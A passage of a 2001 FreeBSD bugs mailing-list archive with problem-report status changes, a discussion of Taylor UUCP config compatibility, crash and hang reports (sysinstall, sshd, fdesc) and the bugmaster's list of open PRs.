but it doesn't seem to to be a problem on -stable. The backtraces looks the same but doesn't seem to make much sense. David. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 3:36:40 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2E51837B401; Mon, 4 Jun 2001 03:36:39 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54Aadf91659; Mon, 4 Jun 2001 03:36:39 -0700 (PDT) (envelope-from dwmalone) Date: Mon, 4 Jun 2001 03:36:39 -0700 (PDT) From: Message-Id: <200106041036.f54Aadf91659@freefall.freebsd.org> To: dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org, dwmalone@FreeBSD.org Subject: Re: gnu/27715: UUCP doesn't recognize traditional BSD config files Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: UUCP doesn't recognize traditional BSD config files Responsible-Changed-From-To: freebsd-bugs->dwmalone Responsible-Changed-By: dwmalone Responsible-Changed-When: Mon Jun 4 03:33:11 PDT 2001 Responsible-Changed-Why: Patch looks straightforward and file is not anywhere near vendor branch. I'll do a buildworld with HAVE_V2_CONFIG enabeled and if it works I'll commit it in a few days. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27715 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 3:45:56 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ED31137B406; Mon, 4 Jun 2001 03:45:54 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54Ajsm92316; Mon, 4 Jun 2001 03:45:54 -0700 (PDT) (envelope-from ru) Date: Mon, 4 Jun 2001 03:45:54 -0700 (PDT) From: Message-Id: <200106041045.f54Ajsm92316@freefall.freebsd.org> To: ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, dfr@FreeBSD.org Subject: Re: kern/27849: AGP RELEASE ioctl frees memory Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: AGP RELEASE ioctl frees memory Responsible-Changed-From-To: freebsd-bugs->dfr Responsible-Changed-By: ru Responsible-Changed-When: Mon Jun 4 03:45:23 PDT 2001 Responsible-Changed-Why: Over to the author of the code. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27849 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 4: 4: 1 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from fjord.dignus.com (sdsl-66-80-58-206.dsl.lax.megapath.net [66.80.58.206]) by hub.freebsd.org (Postfix) with ESMTP id E101C37B403; Mon, 4 Jun 2001 04:03:57 -0700 (PDT) (envelope-from rivers@dignus.com) Received: from lakes.dignus.com (lakes.dignus.com [10.0.0.3]) by fjord.dignus.com (8.11.1/8.11.1) with ESMTP id f54B4Yf85784; Mon, 4 Jun 2001 07:04:34 -0400 (EDT) (envelope-from rivers@dignus.com) Received: (from rivers@localhost) by lakes.dignus.com (8.9.3/8.6.9) id HAA95598; Mon, 4 Jun 2001 07:06:08 -0400 (EDT) Date: Mon, 4 Jun 2001 07:06:08 -0400 (EDT) From: Thomas David Rivers Message-Id: <200106041106.HAA95598@lakes.dignus.com> To: dougb@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG, lyndon@MessagingDirect.COM Subject: Re: gnu/27715: UUCP doesn't recognize traditional BSD config files In-Reply-To: <200106040434.f544Yq232686@freefall.freebsd.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Just F.Y.I... this very point was discussed "to death" in the 1.3 time frame I believe. If I recall correctly, the decision was that - although Taylor UUCP can be configured to accept it's own style of config files, or HDB UUCP config files, or BSD config files - by default we were going to leave it with the Taylor UUCP files. The user can rebuild Taylor UUCP if he desires. This is from memory - I'm not sure if the PR database was even up at the time... but, a look through their might be useful. - Dave Rivers - -- rivers@dignus.com Work: (919) 676-0847 Get your mainframe programming tools at http://www.dignus.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 5: 0:22 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1E81A37B406 for ; Mon, 4 Jun 2001 05:00:16 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54C0Gs06923; Mon, 4 Jun 2001 05:00:16 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 053D837B401 for ; Mon, 4 Jun 2001 04:58:39 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54BwcI06774; Mon, 4 Jun 2001 04:58:38 -0700 (PDT) (envelope-from nobody) Message-Id: <200106041158.f54BwcI06774@freefall.freebsd.org> Date: Mon, 4 Jun 2001 04:58:38 -0700 (PDT) From: jguard@demon.net To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/27872: "Load Config" (sysinstall) hangs Compaq DL360 when used during installation Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27872 >Category: misc >Synopsis: "Load Config" (sysinstall) hangs Compaq DL360 when used during installation >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 04 05:00:15 PDT 2001 >Closed-Date: >Last-Modified: >Originator: James Guard >Release: 4.3 RELEASE >Organization: Demon Internet >Environment: N/A >Description: When attempting to use the "Load Config" option on a Compaq DL360 sysinstall "hangs" and stops responding. The following is output on the second tty: DEBUG: Init floppy called for install.cfg distribution fdc0: direction bit not set fdc0: cmd 3 failed at out byte 1 of 3 fdc0: direction bit not set fdc0: cmd 13 failed at out byte 1 of 4 fdc0: Re-enable FIFO failed fdc0: direction bit not set fdc0: cmd 8 failed at out byte 1 of 1 fdc0: sense intr err reading stat reg 0 fdc0: direction bit not set fdc0: cmd 8 failed at out byte 1 of 1 fdc0: sense intr err reading stat reg 0 fdc0: direction bit not set fdc0: cmd 8 failed at out byte 1 of 1 fdc0: sense intr err reading stat reg 0 fdc0: direction bit not set fdc0: cmd 8 failed at out byte 1 of 1 fdc0: sense intr err reading stat reg 0 fdc0: direction bit not set fdc0: cmd 7 failed at out byte 1 of 2 fdc0: direction bit not set fdc0: cmd 3 failed at out byte 1 of 3 fdc0: direction bit not set fdc0: cmd 13 failed at out byte 1 of 4 The same occurs if an attempt is made to use a repair floppy. This occurs on more than one Compaq DL360. The floppy drive does not appear to be accessed at all (no seek, or motor spin noticeable). The floppy disk used is an MSDOS format floppy that can be mounted and modifiied on the same computer once the OS has been installed. However as the floppy does not appear to be accessed, any floppy disk gives the above symptoms >How-To-Repeat: On a Compaq DL360 boot from the 4.3 Release, put a floppy disk (any floppy disk will do) and select the "Load Config" option at the sysinstall Main Menu. sysinstall will hang, and the second tty will display the fdc errors. >Fix: None known >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 7:13:58 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C847237B406; Mon, 4 Jun 2001 07:13:56 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: (from ru@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54EDq824375; Mon, 4 Jun 2001 07:13:52 -0700 (PDT) (envelope-from ru) Date: Mon, 4 Jun 2001 07:13:52 -0700 (PDT) From: Message-Id: <200106041413.f54EDq824375@freefall.freebsd.org> To: tbyte@tbyte.org, ru@FreeBSD.org, freebsd-bugs@FreeBSD.org, ru@FreeBSD.org Subject: Re: kern/27852: Kernel can't add default route from network that none of its int Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Kernel can't add default route from network that none of its int State-Changed-From-To: open->closed State-Changed-By: ru State-Changed-When: Mon Jun 4 07:13:09 PDT 2001 State-Changed-Why: Committed, thanks! MFC is planned in two weeks. Responsible-Changed-From-To: freebsd-bugs->ru Responsible-Changed-By: ru Responsible-Changed-When: Mon Jun 4 07:13:09 PDT 2001 Responsible-Changed-Why: http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27852 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 8:26: 4 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from research.messagingdirect.com (research.messagingdirect.com [198.161.92.22]) by hub.freebsd.org (Postfix) with ESMTP id 1E2E737B405; Mon, 4 Jun 2001 08:25:59 -0700 (PDT) (envelope-from lyndon@research.messagingdirect.com) Received: from research.messagingdirect.com (localhost [127.0.0.1]) by research.messagingdirect.com (8.12.0.Beta9/8.12.0.Beta9) with ESMTP id f54FPp6M073111; Mon, 4 Jun 2001 09:25:52 -0600 (MDT) Message-Id: <200106041525.f54FPp6M073111@research.messagingdirect.com> From: Lyndon Nerenberg Organization: ACI Worldwide X-URL: http://www.aciworldwide.com/ To: Thomas David Rivers Cc: dougb@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG, lyndon@messagingdirect.com Subject: Re: gnu/27715: UUCP doesn't recognize traditional BSD config files In-Reply-To: Message from Thomas David Rivers of "Mon, 04 Jun 2001 07:06:08 EDT." <200106041106.HAA95598@lakes.dignus.com> Date: Mon, 04 Jun 2001 09:25:51 -0600 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Thomas" == Thomas David Rivers writes: Thomas> If I recall correctly, the decision was that - although Thomas> Taylor UUCP can be configured to accept it's own style of Thomas> config files, or HDB UUCP config files, or BSD config Thomas> files - by default we were going to leave it with the Thomas> Taylor UUCP files. Why would anyone want to break backwards compatability with BSD (back to the very first BSD release) like this? --lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 8:33:42 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from fjord.dignus.com (sdsl-66-80-58-206.dsl.lax.megapath.net [66.80.58.206]) by hub.freebsd.org (Postfix) with ESMTP id A361237B401; Mon, 4 Jun 2001 08:33:37 -0700 (PDT) (envelope-from rivers@dignus.com) Received: from lakes.dignus.com (lakes.dignus.com [10.0.0.3]) by fjord.dignus.com (8.11.1/8.11.1) with ESMTP id f54FYRf86462; Mon, 4 Jun 2001 11:34:27 -0400 (EDT) (envelope-from rivers@dignus.com) Received: (from rivers@localhost) by lakes.dignus.com (8.9.3/8.6.9) id LAA98429; Mon, 4 Jun 2001 11:36:01 -0400 (EDT) Date: Mon, 4 Jun 2001 11:36:01 -0400 (EDT) From: Thomas David Rivers Message-Id: <200106041536.LAA98429@lakes.dignus.com> To: lyndon@messagingdirect.com, rivers@dignus.com Subject: Re: gnu/27715: UUCP doesn't recognize traditional BSD config files Cc: dougb@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG In-Reply-To: <200106041525.f54FPp6M073111@research.messagingdirect.com> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > >>>>> "Thomas" == Thomas David Rivers writes: > > Thomas> If I recall correctly, the decision was that - although > Thomas> Taylor UUCP can be configured to accept it's own style of > Thomas> config files, or HDB UUCP config files, or BSD config > Thomas> files - by default we were going to leave it with the > Thomas> Taylor UUCP files. > > Why would anyone want to break backwards compatability with BSD (back to > the very first BSD release) like this? > > --lyndon > Just F.Y.I. - I was an advocate of at least allowing the HDB style of UUCP includes (at the time, I was moving from a SysV box.) However, I was unable to persuade most people this was worthwhile. So, while we still had UUCP connections - I simply rebuild Taylor UUCP each time I upgraded to allow HDB config scripts. [I was "used" to HDB style and didn't want to spend the effort to learn Taylor-style.] If I remember correctly, and I might be wrong... but, it seems I recall a script or something-or-other that converted the older styles to Taylor-style. I'm not sure the mail archives were even "up" at that point, but a search through them might be revealing. - Dave Rivers - -- rivers@dignus.com Work: (919) 676-0847 Get your mainframe programming tools at http://www.dignus.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 8:40: 7 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 12F3F37B405 for ; Mon, 4 Jun 2001 08:40:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54Fe3337557; Mon, 4 Jun 2001 08:40:04 -0700 (PDT) (envelope-from gnats) Date: Mon, 4 Jun 2001 08:40:04 -0700 (PDT) Message-Id: <200106041540.f54Fe3337557@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Yoshihiro Koya Subject: Re: bin/27860: sshd caught signal 10 Reply-To: Yoshihiro Koya Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27860; it has been noted by GNATS. From: Yoshihiro Koya To: dwmalone@maths.tcd.ie Cc: FreeBSD-gnats-submit@freebsd.org Subject: Re: bin/27860: sshd caught signal 10 Date: Tue, 05 Jun 2001 00:30:50 +0900 Hello, From: David Malone Subject: Re: bin/27860: sshd caught signal 10 Date: Mon, 4 Jun 2001 11:28:31 +0100 Message-ID: <20010604112831.A4410@walton.maths.tcd.ie> > On Mon, Jun 04, 2001 at 05:30:53AM +0900, Yoshihiro Koya wrote: > > > >How-To-Repeat: > > Type > > > > % slogin localhost -l xxxx<10000 times x's>xxx > > I've reproduced this with a -current machine at home but it doesn't > seem to to be a problem on -stable. The backtraces looks the same > but doesn't seem to make much sense. I agree. I couldn't reproduce my 4.3-stable box. The version of that ssh is SSH Version OpenSSH_2.3.0 green@FreeBSD.org 20010321. But, I could reproduced on -current which was build on 2001/01/12. And the version of that ssh is OpenSSH_2.3.0. On the other hand, I had an another sshd.core on my 4.2-stable box which is: 4.2-STABLE FreeBSD 4.2-STABLE #0: Thu Mar 1 12:26:02 JST 2001 The following is the backtraces: --- This GDB was configured as "i386-unknown-freebsd"... (no debugging symbols found)... Core was generated by `sshd'. Program terminated with signal 11, Segmentation fault. Reading symbols from /usr/lib/libopie.so.2...(no debugging symbols found)... done. (snip) Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols found)... done. #0 0x281791c8 in login_getpwclass () from /usr/lib/libutil.so.3 (gdb) where #0 0x281791c8 in login_getpwclass () from /usr/lib/libutil.so.3 #1 0x80532e8 in getsockname () #2 0x805a9ef in getsockname () #3 0x8052fd0 in getsockname () #4 0x804d81d in getsockname () #5 0x804be95 in getsockname () --- In this case, sshd caught signal 11. But the reason why sshd dumped core on that box isn't clear to me. I can, however, reproduce it. In order to get sshd.core, I only have to type % slogin that_host -l nonexistent_user_name The version of ssh is SSH Version OpenSSH_2.3.0, protocol versions 1.5/2.0. koya To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 9:21:43 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1F6C437B401; Mon, 4 Jun 2001 09:21:41 -0700 (PDT) (envelope-from imp@FreeBSD.org) Received: (from imp@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54GLft44500; Mon, 4 Jun 2001 09:21:41 -0700 (PDT) (envelope-from imp) Date: Mon, 4 Jun 2001 09:21:41 -0700 (PDT) From: Message-Id: <200106041621.f54GLft44500@freefall.freebsd.org> To: junkmale@xtra.co.nz, imp@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/11707: ncr isn't recognized in 3.1-19990512-STABLE Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ncr isn't recognized in 3.1-19990512-STABLE State-Changed-From-To: open->closed State-Changed-By: imp State-Changed-When: Mon Jun 4 10:21:18 MDT 2001 State-Changed-Why: junkmale says that he can no longer reproduce this problem. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=11707 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 10: 0: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B0BDB37B401 for ; Mon, 4 Jun 2001 10:00:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54H05u47401; Mon, 4 Jun 2001 10:00:05 -0700 (PDT) (envelope-from gnats) Date: Mon, 4 Jun 2001 10:00:05 -0700 (PDT) Message-Id: <200106041700.f54H05u47401@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Cy Schubert - ITSD Open Systems Group Subject: Re: kern/3685: [BPATCH%] panic: fdesc attr Reply-To: Cy Schubert - ITSD Open Systems Group Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/3685; it has been noted by GNATS. From: Cy Schubert - ITSD Open Systems Group To: Philipp Mergenthaler Cc: freebsd-gnats-submit@FreeBSD.org, cschuber@uumail.gov.bc.ca Subject: Re: kern/3685: [BPATCH%] panic: fdesc attr Date: Mon, 04 Jun 2001 09:50:43 -0700 In message <20010602234125.A2255@i609.hadiko.de>, Philipp Mergenthaler writes: > This PR can be closed. > There have been many changes to this file; instead of a switch(fp->f_type) > there's now a call fo_stat(fp, ...) etc. > > Also, I can't reproduce this panic on -current: > > /tmp#mount_fdescfs fdesc /tmp/fdd > /tmp#find /tmp -type d -perm 777 | xargs ls -ld > find: /tmp/fdd/8: Bad file descriptor > /tmp# > /tmp#find /tmp -type d -perm 777 | xargs ls -l > find: /tmp/fdd/8: Bad file descriptor > /tmp# > /tmp#uname -a > FreeBSD i609.hadiko.de 5.0-CURRENT FreeBSD 5.0-CURRENT #402: Fri Jun 1 19:10 > :19 CEST 2001 p@i609.hadiko.de:/usr/obj/usr/src/sys/I609 i386 > > > Bye, Philipp Sure, let's close it. I cannot recreate the problem under -stable either: FreeBSD passer 4.3-RELEASE FreeBSD 4.3-RELEASE #1: Wed May 9 06:48:58 PDT 2001 root@:/opt/cvs-430r/src/sys/compile/PASSER Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 11: 0:14 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9657337B403 for ; Mon, 4 Jun 2001 11:00:12 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54I0CD55236 for freebsd-bugs@freebsd.org; Mon, 4 Jun 2001 11:00:12 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 4 Jun 2001 11:00:12 -0700 (PDT) Message-Id: <200106041800.f54I0CD55236@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: open PR's (mis)filed to gnats-admin and in limbo Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports Critical problems Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [2001/05/29] pending/27753gnats-adminCompactFlash Media reader broken with Fre 1 problem total. Non-critical problems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 4 11: 2:57 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 79E2837B401 for ; Mon, 4 Jun 2001 11:00:29 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f54I0C655243 for freebsd-bugs@freebsd.org; Mon, 4 Jun 2001 11:00:12 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 4 Jun 2001 11:00:12 -0700 (PDT) Message-Id: <200106041800.f54I0C655243@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: Current problem reports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The report has been examined by a team member and evaluated. f - feedback The problem has been solved, and the originator has been given a patch or a fix has been committed. The PR remains in this state pending a response from the originator. s - suspended The problem is not being worked on. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1997/12/21] kern/5355 bp Fix for NULLFS problems f [1998/05/13] kern/6630 julian [PATCH] Fix for Cyrix I8254 bug o [1998/07/12] kern/7264 gibbs Buslogic BT 950 scsi card not detected a [1998/11/08] ports/8609 nectar eklogin service (kerberos klogind) fails o [1998/11/25] kern/8861 mdodd under heavy (multi interface) traffic ep0 o [1999/02/20] kern/10172 [panics] Kernel (esp kern/sys_pipe.c) die f [1999/03/09] kern/10507 wosch Process hangs in state VM pgd o [1999/03/09] kern/10520 bp can't exec files under nullfs f [1999/03/11] kern/10542 page fault while in kernel mode, not kern o [1999/03/11] kern/10545 will When a fork/exec stress test is run, the f [1999/03/27] kern/10828 3.1-STABLE freezes when writing to floppy o [1999/03/30] kern/10872 Panic in sorecieve() due to NULL mbuf poi f [1999/04/17] kern/11196 kernel mode page fault o [1999/04/20] kern/11241 Install fails after SCSI probe o [1999/05/24] kern/11869 wpaul Network hangging due to xl0: tx underrun o [1999/05/31] kern/11966 TCP copies send and receive socket buffer o [1999/06/02] kern/11988 recvmsg with a cmsghdr but no iovec is br s [1999/06/05] kern/12041 n_hibma Crashes on startup if Zip drive is switch o [1999/06/07] kern/12072 vm_fault happened in binary file transfer s [1999/06/23] kern/12367 Writing files larger than floppy capacity o [1999/06/25] kern/12395 gibbs Buslogic SCSI cards (BT948) time out unde o [1999/06/30] kern/12466 Fast system hangs under high FS load o [1999/07/05] kern/12521 lmbench-1.1's context switching test hang o [1999/07/12] misc/12607 System crashes after boot, portmap endles o [1999/07/13] alpha/12623 alpha Certain valid numeric strings cause a SIG o [1999/07/21] kern/12730 poll() causes indeterministic program han o [1999/08/02] misc/12923 Installation fails on HP Net Server o [1999/08/10] i386/13059 imp Install aborts with panic:aha0: Invalid C o [1999/09/12] kern/13709 panic: sched_sync: fsync failed o [1999/09/19] kern/13825 tx0 "holds" packets for long periods, eve o [1999/09/19] i386/13844 keyboard locks up when I page through a m o [1999/09/22] i386/13892 Kern.flp does not boot on Compaq Presario o [1999/09/24] i386/13933 nfs server panics in tulip_rx_intr() o [1999/09/24] kern/13940 Panic with dd on block/"cooked" devices u o [1999/09/27] misc/13995 Full duplex mode doesn't work right with o [1999/09/28] i386/14030 imp aha0 probe fails 3.3.0-RELEASE install wi o [1999/10/14] kern/14322 mount respects permissions of underlying o [1999/10/25] kern/14510 kernel panic while pressing panic o [2000/02/09] i386/16620 mdodd 4.0-20000208-CURRENT fails to boot on ASU o [2000/02/14] kern/16708 wpaul 3Com 3c900-Combo Ehternet card make kerne o [2000/02/15] kern/16740 mckusick The kernel panics with "ffs_clusteralloc: o [2000/02/18] i386/16802 An user math program have the system on K o [2000/02/19] kern/16828 High Speed Pinging Over 8184 bytes Kills o [2000/02/21] kern/16890 Fatal trap 12: page fault while in kernel o [2000/02/26] kern/17011 Fatal trap 12 occur, dhclient with BOOTP f [2000/02/28] kern/17067 consistent "make -k buildworld" crash wit f [2000/03/07] kern/17248 FreeBSD 3.4 won't install on 486/100 IBM o [2000/03/10] kern/17305 advansys driver time-out around 30 minute o [2000/03/15] i386/17391 jhb FreeBSD boot loader does not recognize ke o [2000/03/18] i386/17485 Partition editor completely non-functiona o [2000/03/22] i386/17558 ncr1 controller is not working properly i o [2000/03/27] kern/17620 jhay Digi/570i sync driver (if_ar.c) causes sy o [2000/03/28] alpha/17642 alpha FreeBSD/alpha 4.0 RELEASE installation fa o [2000/04/04] bin/17791 Restore does not handle bad or missing ta o [2000/04/04] misc/17793 Keyboard not found o [2000/04/04] ports/17806 msmith make in ports/net/citrix_ica loops on scr o [2000/04/04] i386/17808 cannot swap /dev/.... o [2000/04/08] kern/17870 4.0-release consistently crashes a couple o [2000/04/18] kern/18074 Fatal trap 12: page fault while in kernel o [2000/04/23] kern/18182 Remote serial gdb no longer works since m o [2000/04/24] bin/18198 owner of ccontrol file in spool dir is wr o [2000/04/24] misc/18201 Freeze at boot time when trying to upgrad o [2000/04/27] kern/18265 Vendor specific word = FFFF o [2000/05/09] misc/18466 dillon install via nfs or ftp media silently tru o [2000/05/13] bin/18531 installation will not read files frm flop s [2000/05/17] misc/18641 paul FreeBSD V4.0 crashes when using ifconfig o [2000/05/23] misc/18786 SCSI hangs during FreeBSD 4.0 installatio s [2000/05/24] misc/18793 ken Hitachi DK319H needs quirk entry to work o [2000/05/29] kern/18874 32bit NFS servers export wrong negative v o [2000/05/29] bin/18887 Undefined symbol "_krb_err_txt" in telnet o [2000/06/05] kern/19022 cg pcm driver causes immediate panic on use f [2000/06/09] kern/19162 asmodai 4.0-STABLE panics w/ softupdates and quot o [2000/06/13] kern/19247 jasone uthread_sigaction.c does not do anything o [2000/06/14] misc/19257 Detection of connected ports on a Cyclom o [2000/06/15] kern/19297 Multi-processor kernel fails to boot on T o [2000/06/16] conf/19336 write failure when adding distribution fi o [2000/06/23] kern/19480 System hang when use current (GENERIC) ke a [2000/06/30] ports/19613 nate java causing SIGSEGV 11* segmentation vi o [2000/07/01] conf/19629 imp /etc/rc.sysctl can't set all syctls o [2000/07/05] kern/19726 wpaul fatal trap 12 / page fault o [2000/07/09] kern/19794 FreeBSD 4.0-Stable crash o [2000/07/12] gnu/19882 obrien ld does not detect all undefined symbols! o [2000/07/20] ports/20077 jmz Latex 99.12 fails to make completely o [2000/07/27] kern/20227 jlemon 4.1-RC: UDP checksum problem o [2000/07/30] i386/20308 yokota vidcontrol VESA_800x600 causes a kernel p f [2000/07/31] kern/20310 groudier Symbios 53c875j drivers don't work o [2000/08/01] misc/20353 4.1 doesn't work on Compaq ML370 o [2000/08/03] kern/20375 APM doesn't work properly! Suspend/resum o [2000/08/05] kern/20429 yokota setting flags 0x1 in atkbd0 locks keyboar o [2000/08/08] kern/20484 jlemon FreeBSD 4.0 crashes repeatedly: trap 12: o [2000/08/08] bin/20489 davidn pw problems: -w random not working correc o [2000/08/08] i386/20495 yokota 4.1-STABLE and 4.1-RELEASE: keyboard does o 